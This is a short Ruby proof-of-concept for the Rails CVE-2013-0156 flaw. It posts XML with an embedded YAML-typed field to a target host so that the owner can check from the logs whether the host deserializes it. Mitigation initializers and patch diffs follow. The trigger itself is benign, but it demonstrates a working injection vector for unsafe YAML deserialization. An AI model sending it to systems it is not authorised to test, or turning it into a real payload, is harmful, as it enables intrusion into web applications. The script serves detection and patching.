# CVE-2013-0156 Proof-of-Concept
# Public Domain (ofc)
#
# - vjt@openssl.it
#
require 'rubygems'
require 'restclient'
require 'builder'
require 'yaml'

# Build the trigger XML
#
xml = (
  x = Builder::XmlMarkup.new
  x.instruct!
  x.hash do
    x.foo 'type' => 'yaml', '__content__' => Object.new.to_yaml
  end.to_s
)

xml2 = (
  x = Builder::XmlMarkup.new; x.instruct!
  x.foo(Object.new.to_yaml, :type => 'yaml')
)

# Post it to your app. If you see
#
#   Parameters: {"hash"=>{"foo"=>#<Object:0xb5bfd294>}, ...}
#
# in your logs - then YOU ARE VULNERABLE. Apply the Rails patches IMMEDIATELY:
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# For live, production systems, two initializers are included ad the end of
# this file.
#
# If you see
#
#   Parameters: {"hash"=>{"foo"=>"--- !ruby/object {}\n"}, ...}
#
# you are NOT vulnerable - and you can sleep safe. :-)
#
host = ARGV[0] or raise "Usage: #$0 <host>"
puts "POSTing to #{host}"
RestClient.post host, xml,  :content_type => :xml rescue nil
RestClient.post host, xml2, :content_type => :xml rescue nil

__END__

# Rails 3.0 - 3.2
#
ActiveSupport::XmlMini::PARSING.delete('symbol')
ActiveSupport::XmlMini::PARSING.delete('yaml')

# Rails 2.0 - 2.3
#
ActiveSupport::CoreExtensions::Hash::Conversions::XML_PARSING.delete('symbol')
ActiveSupport::CoreExtensions::Hash::Conversions::XML_PARSING.delete('yaml')

# Older - you're screwed
#
diff --git a/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb b/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb
index b069667..a6162a7 100755
--- a/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb
+++ b/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb
@@ -51,8 +51,6 @@ class CGIMethods #:nodoc:
           strategy.call(raw_post_data)
         when :xml_simple
           raw_post_data.blank? ? {} : Hash.from_xml(raw_post_data)
-        when :yaml
-          YAML.load(raw_post_data)
         when :xml_node
           node = XmlNode.from_xml(raw_post_data)
           { node.node_name => node }
diff --git a/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb b/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb
index bbfc250..b0d1cc6 100644
--- a/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb
+++ b/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb
@@ -130,7 +130,6 @@ module ActiveSupport #:nodoc:
                       when "boolean"  then content.strip == "true"
                       when "datetime" then ::Time.parse(content).utc
                       when "date"     then ::Date.parse(content)
-                      when "yaml"     then YAML::load(content) rescue content
                       else                 content
                     end
                   else